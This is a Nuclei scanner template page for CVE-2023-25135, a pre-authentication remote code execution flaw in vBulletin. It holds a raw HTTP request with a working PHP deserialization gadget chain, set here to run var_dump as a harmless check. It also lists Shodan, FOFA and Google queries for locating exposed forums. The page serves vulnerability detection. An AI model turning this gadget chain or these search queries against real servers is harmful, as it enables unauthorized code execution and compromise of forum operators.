vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
ID: CVE-2023-25135
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,vbulletin,rce
Description
Section titled “Description”vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
YAML Source
Section titled “YAML Source”id: CVE-2023-25135
info: name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py - https://nvd.nist.gov/vuln/detail/CVE-2023-25135 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch - https://github.com/netlas-io/netlas-dorks classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-25135 cwe-id: CWE-502 epss-score: 0.71557 epss-percentile: 0.98058 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vbulletin product: vbulletin shodan-query: - http.component:"vBulletin" - http.html:"powered by vbulletin" - http.component:"vbulletin" - http.title:"powered by vbulletin" - cpe:"cpe:2.3:a:vbulletin:vbulletin" fofa-query: - body="powered by vbulletin" - title="powered by vbulletin" google-query: - intext:"Powered By vBulletin" - intitle:"powered by vbulletin" - intext:"powered by vbulletin" tags: cve,cve2023,vbulletin,rce
http: - raw: - | POST /ajax/api/user/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
matchers-condition: and matchers: - type: word part: body words: - 'string(14)' - '"CVE-2023-25135"' condition: and
- type: word part: header words: - "application/json"
- type: status status: - 200# digest: 4b0a00483046022100bad15f88a11d609952640995d7c83f4da3808e77d0dc933c18f7230f9695f465022100e17a405ebc53b08b446ed39ab0e3ea2b1140efac05b80208eaf32c08e59b60b1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-25135.yaml"